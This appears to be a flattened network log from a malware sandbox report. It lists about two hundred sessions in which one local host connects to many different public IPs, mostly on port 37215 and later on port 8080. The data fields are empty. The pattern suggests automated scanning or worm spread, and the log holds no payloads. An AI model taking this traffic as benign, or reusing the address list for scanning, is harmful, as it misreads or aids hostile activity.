                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4806192.168.2.234736041.206.67.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4807192.168.2.2333682157.47.110.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4808192.168.2.235073241.104.125.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4809192.168.2.2337508197.198.133.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4810192.168.2.2354912193.178.192.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4811192.168.2.235042241.122.61.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4812192.168.2.2346150197.231.204.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4813192.168.2.2343554133.51.25.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4814192.168.2.2356332145.35.208.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4815192.168.2.2340218120.110.173.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4816192.168.2.235123441.173.189.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4817192.168.2.235346241.61.156.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4818192.168.2.2360836157.113.132.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4819192.168.2.2359800197.218.66.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4820192.168.2.235088441.74.122.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4821192.168.2.233973841.20.106.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4822192.168.2.2334126210.245.43.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4823192.168.2.2337100157.90.57.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4824192.168.2.2335796157.132.85.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4825192.168.2.234609841.20.193.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4826192.168.2.2347998197.255.112.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4827192.168.2.2347686197.50.149.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4828192.168.2.234740641.16.77.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4829192.168.2.2333656172.248.74.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4830192.168.2.2354600157.59.107.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4831192.168.2.2347998135.223.34.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4832192.168.2.2341650157.26.36.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4833192.168.2.2338998197.115.136.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4834192.168.2.233498841.140.128.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4835192.168.2.235200441.247.148.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4836192.168.2.2356400197.116.246.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4837192.168.2.2338690158.247.249.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4838192.168.2.235741641.88.182.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4839192.168.2.2345570157.69.131.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4840192.168.2.2336964197.163.31.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4841192.168.2.235364284.42.4.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4842192.168.2.2349574141.162.64.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4843192.168.2.2342784197.79.25.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4844192.168.2.235906041.106.199.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4845192.168.2.2355374157.76.70.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4846192.168.2.2349190193.241.162.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4847192.168.2.235843641.150.175.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4848192.168.2.2335134108.67.108.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4849192.168.2.234728424.90.20.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4850192.168.2.2339834197.219.50.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4851192.168.2.234205823.66.113.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4852192.168.2.235192853.59.77.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4853192.168.2.235769479.109.182.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4854192.168.2.2357914197.243.238.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4855192.168.2.2336678197.205.80.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4856192.168.2.235558841.25.33.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4857192.168.2.2335188157.10.93.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4858192.168.2.233850041.131.46.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4859192.168.2.2337726197.49.149.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4860192.168.2.2347096197.1.130.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4861192.168.2.234443841.255.168.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4862192.168.2.233972041.218.32.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4863192.168.2.233656841.49.176.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4864192.168.2.2354158175.134.55.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4865192.168.2.235593641.49.86.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4866192.168.2.2333446157.238.238.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4867192.168.2.2346938126.141.42.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4868192.168.2.2335036197.29.157.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4869192.168.2.2342264157.58.10.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4870192.168.2.2342252157.23.137.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4871192.168.2.2352924157.171.245.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4872192.168.2.234217241.168.200.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4873192.168.2.236012820.126.36.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4874192.168.2.235611841.234.51.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4875192.168.2.2341696157.163.142.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4876192.168.2.2342350157.127.18.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4877192.168.2.2351028157.8.189.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4878192.168.2.235841427.31.66.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4879192.168.2.233745841.242.80.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4880192.168.2.2340960157.215.243.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4881192.168.2.235620841.132.27.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4882192.168.2.233604841.151.42.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4883192.168.2.2349242197.114.50.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4884192.168.2.234277041.157.72.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4885192.168.2.2346022197.84.53.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4886192.168.2.233298098.85.30.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4887192.168.2.2346842197.151.49.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4888192.168.2.234349031.145.208.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4889192.168.2.234692841.90.124.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4890192.168.2.233444641.147.189.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4891192.168.2.2335086157.191.81.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4892192.168.2.2351412157.217.104.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4893192.168.2.233918241.4.19.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4894192.168.2.235585441.62.141.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4895192.168.2.2360184122.39.17.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4896192.168.2.2358782157.79.64.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4897192.168.2.233503641.112.29.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4898192.168.2.233310867.107.159.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4899192.168.2.2332778157.223.99.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4900192.168.2.2343288157.90.111.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4901192.168.2.2359706158.29.138.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4902192.168.2.2336992216.252.126.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4903192.168.2.234555841.37.2.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4904192.168.2.2360110218.153.201.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4905192.168.2.2349394212.66.6.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4906192.168.2.2347042157.167.119.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4907192.168.2.2333282157.3.172.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4908192.168.2.234228241.126.90.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4909192.168.2.2335048197.59.159.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4910192.168.2.2352702197.27.248.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4911192.168.2.2339584197.138.201.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4912192.168.2.2358332197.80.48.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4913192.168.2.233392241.209.253.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4914192.168.2.235784241.255.158.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4915192.168.2.2353146157.251.156.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4916192.168.2.2339604197.58.117.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4917192.168.2.233697241.130.2.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4918192.168.2.2343990184.198.77.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4919192.168.2.234875841.245.37.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4920192.168.2.2336566157.217.180.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4921192.168.2.2356670157.244.182.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4922192.168.2.2360296157.15.128.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4923192.168.2.2341792197.25.74.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4924192.168.2.2338224157.41.15.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4925192.168.2.235931690.242.20.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4926192.168.2.233650241.140.197.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4927192.168.2.2348106167.65.136.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4928192.168.2.235146223.31.135.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4929192.168.2.2349078157.165.127.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4930192.168.2.233752499.167.64.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4931192.168.2.2341972197.119.124.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4932192.168.2.234269613.244.165.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4933192.168.2.235158841.205.60.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4934192.168.2.234905441.179.80.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4935192.168.2.235102241.167.175.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4936192.168.2.2359622146.125.12.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4937192.168.2.2358932197.37.154.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4938192.168.2.2343758157.59.213.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4939192.168.2.233887241.11.89.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4940192.168.2.2342626197.219.212.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4941192.168.2.234992041.113.67.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4942192.168.2.2351696157.146.134.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4943192.168.2.233495841.60.218.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4944192.168.2.234205886.181.181.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4945192.168.2.234022641.145.83.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4946192.168.2.2355462197.53.170.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4947192.168.2.235688841.50.48.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4948192.168.2.235795290.135.181.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4949192.168.2.2335154157.122.204.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4950192.168.2.2358318157.45.245.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4951192.168.2.2357336216.94.79.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4952192.168.2.2333170197.164.251.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4953192.168.2.2335064157.133.6.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4954192.168.2.235906241.121.224.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4955192.168.2.2344842116.95.163.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4956192.168.2.2339638157.61.232.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4957192.168.2.2356028187.24.180.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4958192.168.2.2339514197.254.88.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4959192.168.2.234678041.37.197.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4960192.168.2.2352402197.29.131.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4961192.168.2.2352784157.75.98.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4962192.168.2.234249814.253.49.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4963192.168.2.235300641.194.102.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4964192.168.2.233829295.93.189.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4965192.168.2.234359041.2.30.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4966192.168.2.233630241.222.158.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4967192.168.2.233614041.35.70.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4968192.168.2.2350206157.11.45.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4969192.168.2.2356438157.178.249.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4970192.168.2.2340352156.97.97.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4971192.168.2.235729287.208.204.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4972192.168.2.235921244.165.214.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4973192.168.2.235987041.182.130.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4974192.168.2.2342488157.92.117.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4975192.168.2.233559646.6.84.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4976192.168.2.235979641.156.24.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4977192.168.2.2343220197.12.181.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4978192.168.2.235813641.78.41.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4979192.168.2.235659241.39.94.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4980192.168.2.2350688123.85.107.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4981192.168.2.2355394197.61.141.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4982192.168.2.2350792157.184.168.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4983192.168.2.2351638205.83.105.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4984192.168.2.234959241.22.72.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4985192.168.2.234742072.245.153.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4986192.168.2.235089059.30.197.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4987192.168.2.2342356138.253.41.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4988192.168.2.2358888183.99.1.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4989192.168.2.2334480115.103.107.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4990192.168.2.2333878102.116.124.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4991192.168.2.234746846.161.100.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4992192.168.2.235456484.195.180.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4993192.168.2.234666039.121.221.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4994192.168.2.2349714112.197.209.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4995192.168.2.233584674.32.213.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4996192.168.2.234382473.109.190.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4997192.168.2.2334298202.45.136.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4998192.168.2.2357886111.82.55.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4999192.168.2.234472420.183.60.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5000192.168.2.235312072.73.104.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5001192.168.2.2341888100.217.98.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5002192.168.2.2356660101.32.244.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5003192.168.2.2349566120.93.230.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5004192.168.2.2337398167.22.112.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5005192.168.2.2360714192.243.103.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5006192.168.2.233505614.252.184.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5007192.168.2.2343476203.3.207.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5008192.168.2.2336946144.71.188.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5009192.168.2.2352060190.131.218.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5010192.168.2.2358622174.239.20.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5011192.168.2.2334582208.194.47.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5012192.168.2.2342356171.29.235.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5013192.168.2.235748239.51.43.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5014192.168.2.2359436120.14.208.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5015192.168.2.234856690.26.182.1958080
